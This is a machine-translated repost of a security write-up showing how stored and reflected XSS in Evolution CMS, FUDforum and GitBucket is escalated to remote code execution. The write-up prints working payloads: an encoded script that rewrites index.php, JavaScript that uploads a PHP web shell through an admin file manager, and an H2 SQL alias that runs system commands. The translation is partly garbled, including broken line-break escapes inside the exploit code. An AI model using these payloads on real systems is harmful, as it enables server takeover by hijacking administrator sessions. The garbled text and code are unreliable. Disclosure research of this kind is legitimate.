XSS is also known as cross-site scripting attack, exploiting this vulnerability can execute arbitrary JavaScript scripts, and RCE is remote name execution, which can execute arbitrary system commands. So how to upgrade to RCE vulnerability through XSS vulnerability? Share a few open source cases today. Original:
https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/
0x01 Use file modification function Case name: Evolution CMS v3.1.8
Project address: https://github.com/evolution-cms/evolution
found a user-controlled parameter that was not encoded and escaped when auditing the source code. This is a typical reflection XSS vulnerability. File path: manager
/ views/page/user_roles/permission.blade.php
Next, construct the accessed URL and insert the payload to verify the XSS vulnerability:
https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20οnerrοr=alert(document.domain)% 3E
is not accessible by any authority, but requires administrator authority. After opening, you can see the pop-up payload we inserted:
in the background of Evolution CMS, the file manager part can upload files, but cannot upload php files. However, the manager can edit existing files, so we can use javascript to implement the file editing function, and modify the content of index.php as follows phpinfo(): $.get('/manager/?a=31',function(d) {
let p = $(d).contents().find('input[name="path"]').val(); $.ajax({
url:'/manager/index.php', type:'POST', contentType:'application/x-www-form-urlencoded', data:'a=31&mode=save&path='+p+'/index.php&content=<?php phpinfo(); ?>'} );});Next, base64 encode the javascript code and insert it into the vulnerability parameter:
https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20οnerrοr=eval(atob(%27JC5nZXQoJy9tYW5hZ2VyLz9hPTMxJyxmdW5jdGlvbihkKXtsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPSJwYXRoIl0nKS52YWwoKTskLmFqYXgoe3VybDonL21hbmFnZXIvaW5kZXgucGhwJyx0eXBlOidQT1NUJyxjb250ZW50VHlwZTonYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyxkYXRhOidhPTMxJm1vZGU9c2F2ZSZwYXRoPScrcCsnL2luZGV4LnBocCZjb250ZW50PTw/cGhwIHBocGluZm8oKTsgPz4nfSk7fSk7%27))%3E
以管理员权限访问上面的URL, you can successfully modify the index.php content of the home page:
0x02 Use any file to upload project name: FUDforum v3.1.1
Project address: https://github.com/fudforum/FUDforum
FUDforum is an ultra-fast and scalable forum program. Highly customizable and supports unlimited members, forums, posts, topics, polls and attachments.
In this program, the user-controlled parameters are not processed in the attachment names of private messages or forum topics, which is a stored XSS vulnerability. Changing the uploaded file name to a new one, and then downloading the file will trigger xss execution <img src=1 onerror=alert()>.png:
The FUDforum admin panel has a file manager that allows you to upload files to the server, including files with a php extension, an attacker can use stored XSS to upload a php file that can execute any command on the server.
FUDforum has a public vulnerability:
https://packetstormsecurity.com/files/155261/FUDForum-3.0.9-Code-Execution-Cross-Site-Scripting.html
Using javascript code to upload php files: const action = '/adm/admbrowse.php';function uploadShellWithCSRFToken(csrf) {
let cur = '/var/www/html/fudforum.loc'; let boundary = "-----------------------------347796892242263418523552968210"; let contentType = "application/x-php"; let fileName = 'shell.php'; let fileData = "<?=`$_GET[cmd]`?>"; let xhr = new XMLHttpRequest(); xhr.open('POST', action, true); xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary); let body = "--" + boundary + "rn"; body += 'Content-Disposition: form-data; name="cur"rnrn'; body += cur + "rn"; body += "--" + boundary + "rn"; body += 'Content-Disposition: form-data; name="SQ"rnrn'; body += csrf + "rn"; body += "--" + boundary + "rn"; body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"rn'; body += "Content-Type: " + contentType + "rnrn"; body += fileData + "rnrn"; body += "--" + boundary + "rn"; body += 'Content-Disposition: form-data; name="tmp_f_val"rnrn'; body += "1" + "rn"; body += "--" + boundary + "rn"; body += 'Content-Disposition: form-data; name="d_name"rnrn'; body += fileName + "rn"; body += "--" + boundary + "rn"; body += 'Content-Disposition: form-data; name="file_upload"rnrn'; body += "Upload File" + 'rn'; body += "--" + boundary + "--"; xhr.send(body);}let req = new XMLHttpRequest();req.onreadystatechange = function() {
if (req.readyState == 4 && req.status == 200) {
let response = req.response; uploadShellWithCSRFToken(response.querySelector('input[name=SQ]').value); }}req.open("GET", action, true);req.responseType = "document";req.send();attackers can send themselves a Private message, and use the above payload as the attachment name. After sending the message to yourself, you can get the path of the xss vulnerability on the server: index.php?
t=getfile&id=7&private=1
The next step is to construct a new payload for triggering Payload of file upload: $.get('index.php?t=getfile&id=7&&private=1',function(d){eval(d)})base64-encode the above payload and save it as the following file name: After <img src=1 onerror=eval(atob('JC5nZXQoJ2luZGV4LnBocD90PWdldGZpbGUmaWQ9NyYmcHJpdmF0ZT0xJyxmdW5jdGlvbihkKXtldmFsKGQpfSk='))>.pngthe administrator reads the private message and attachment sent by the attacker, he will create a file named shell.php on the server as an administrator file, you can use this backdoor to execute arbitrary commands:
0x03 Use the database to execute commands Project name: GitBucket v4.37.1
Project address: https://github.com/gitbucket/gitbucket
GitBucket is a Scala-based Git platform with easy installation, high scalability and GitHub API compatibility. /hacker?tab=activityIn GitBucket, it was found that user-controlled issue names were displayed unescaped on the homepage and the attacker's profile page ( ), which resulted in stored XSS:
With the xss vulnerability, the next step is to look for functions that can execute system names. The management control panel has tools to execute SQL queries. GitBucket uses the H2 database engine by default:
https://www.h2database.com/html/main.html
for this database , there is a publicly available vulnerability to achieve remote code execution:
https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
An attacker can create a PoC code based on this vulnerability: var url = "/admin/dbviewer/_query";$.post(url, {query: 'CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : ""; }$$;'}).done(function(data) {$.post(url, {query: "CALL EXECVE('touch HACKED')"})})Upload this code to the repository:
Then create a new issue or re-order the old issue: Issue 1"><script src="/hacker/Repo1/raw/f85ebe5d6b979ca69411fa84749edead3eec8de0/exploit.js"></script>
when the administrator visits the attacker's profile homepage, it will trigger the execution of the payload to create a file on the server;
check on the server whether the creation is successful:
0x04 Summary This article takes an actual open source project as an example
It demonstrates how to upgrade to a command execution vulnerability through the xss vulnerability. The core still depends on the function of the system itself or the file upload and command execution problems of the system that it depends on. Otherwise, the command execution cannot be directly implemented through the xss vulnerability.
Usually, the management background of the application system has rich functions and high permissions, including the ability to upload and modify arbitrary files, as well as database operations and command execution. Then, through XSS vulnerabilities, administrators can access and execute background functions to obtain higher permissions. , in actual combat, if it is an open source system, it can be well analyzed and utilized. If it is an unknown system, it is difficult to understand the functions of the background, and it is not very easy to use
Reprinted from: Aleksey Solovev Xin'an Road
https://mp.weixin.qq.com/s/qK6EfQdoO43C49S6ehPc7w